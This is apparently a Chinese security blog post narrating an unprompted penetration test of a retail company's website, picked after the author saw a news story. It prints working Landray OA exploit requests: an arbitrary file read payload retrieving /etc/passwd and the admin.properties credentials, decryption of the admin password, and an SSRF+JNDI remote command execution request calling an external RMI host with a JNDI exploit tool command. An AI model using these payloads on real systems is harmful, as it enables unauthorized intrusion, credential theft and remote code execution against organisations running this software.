对某宁百货的一次渗透测试

今天是2021年5.30号，心情不知道为什么有点压抑

可能是夏天的到来，天气太热了吧----

公众号也断更了好长时间了，都在忙自己的事情

可能 没时间写文章吧

害，前几天在新闻上看见 某某女子在某宁百货贩卖毒品被抓

也只是随意瞟了一眼，因为这种新闻太多了

所以，没有怎么关注 只是感叹一二

到了这几天  突然又看到了这个新闻，我只能说大数据的强大。

害，那就看看这个某宁百货吧

百度查查吧，看到了官网。

啊这，这网站为什么显示个不安全，做的也略有粗糙啊

Qwq

可能不是大公司吧，我天眼查查了下

啊这，注册资本蛮蛮高的啊，为啥网站这么拉。

害，看到这个网站，第一步先做个潦草的信息收集

在一次渗透测试中，信息收集是非常重要的，至于怎么收集就要看自己的骚操作了

二话不说，先放arl跑一下吧，看看站点ip，有没有子域名，文件泄露这些。

好家伙，啥都没有，就出现个ip开了个443开了个80

这拿命利用，这这站点怎么就资产这么少呢？

换御剑看看

       哇靠，好悲哀啊，空空如也

连个后台和登录口都没吗？？

可笑啊

备案查询了下，结果给我来个

这是对穷人的歧视吗？？

呼呼，whois查询

出现了 一些有用的东西

比如说其他常用域名后缀

这时候就联想到一个思路

这个某宁百货是不是还有其他的域名网站？

这只是他的傀儡网站呢？

或者他的后台 等东西是单独作为一个网站？

并不是所谓的子域名

嗯，这个思路在我脑子里产生了

我往下翻了看，看已注册的后缀

我敲，这么多已注册，会不会和我的想法重叠？？

试试吧，一个个访问看看

经过我的测试，属于某宁百货的网站 是xxx.com.cn  xxx.net

哈

果然 功夫不负有心人

Xxx.net是某宁百货的登录系统  xxx.com.cn也是主页

对xx.com.cn进行一下资产收集

我敲，又是没啥

Goby看看

这似乎没啥可利用的

害，还是去看看

XXX．Net吧  看看登录系统有没有什么可利用的

害，为啥登陆系统是单独的一个域名

好骚的操作。

呼，感觉有点希望了，总算收集到一个可以利用的资产

见到网站，就goby goby 看看框架还有系统结构资产

能用工具 我为什么要手测？对吧

看了看端口，没啥可利用的，23端口，呼呼呼 没办法。

但是 在组件上面又有了个重大发现！

Landray-OA！！！！

蓝凌oa 我敲。

前端时间帮朋友做的一个渗透测试 oa系统 就是蓝凌oa

有漏洞可利用啊 蓝凌oa

这时候 我们就来检测有没有漏洞吧

打开神器，peiqi文库

呼呼 蓝凌oa漏洞不少呢，就是不知道某宁百货他是不是最新版本的蓝凌oa

或者它它是没有漏洞的

像这种页面看起来低版本的蓝凌oa系统 一般都是有任意文件读取漏洞的

http://www.xxxx,net/login.jsp

打开burp抓包截取下看看

请求包

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

Content-Length: 42

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

var={"body":{"file":"file:///etc/passwd"}}

成功读取到etc下passwd下面的敏感文件

哈，某宁百货有任意文件读取，算个小中危吧

既然有任意文件读取了，那我肯定要利用起来

试试读取WEB-INF/KmssConfig/admin.properties

的配置文件

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

呼呼 果然，读取到了一串密文

分析一下子，这不是des加密吗？？

来des解密一下

       好兄弟 明文密码abcABC123？？？？

这尼玛不是弱口令吗。玩孩子呢

明文密码出来了 那我们就利用下

http://www.xxxx.net/admin.do

进配置后台

PS;因为提交到了补天 emmmmmm

这这 就进入了配置后台

还可以进一步利用

进了oa的配置后台

我们还可以拿到shell

蓝凌OA SSRF+JNDI远程命令执行

这几个大字说明了一切

Ssrf+jndi远程命令执行

由于 之前的时原因 就没有进一步利用了

点到为止。

具体步骤也就是利用工具

具体步骤如下：

使用工具执行命令

https://github.com/welk1n/JNDI-Injection-Exploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

运行工具监听端口 ping dnslog测试 命令执行 (蓝凌OA 默认使用的是 JDK 1.7)

POST /admin.do HTTP/1.1

Host:

Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967

Content-Length: 70

Cache-Control: max-age=0

Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"

Sec-Ch-Ua-Mobile: ?0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36

Origin:

Content-Type: application/x-www-form-urlencoded

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/cbdsdg

Ps：此步骤来源于peiqi文库

到此 对某宁百货的一次没有技术含量的渗透测试到此为止了

做个笔记，给自己增加知识吧，文章是今天写的，素材是之前的。

呼，fw的我滚去睡觉了。

原文始发于微信公众号（G23安全实验室）：对某宁百货的一次渗透测试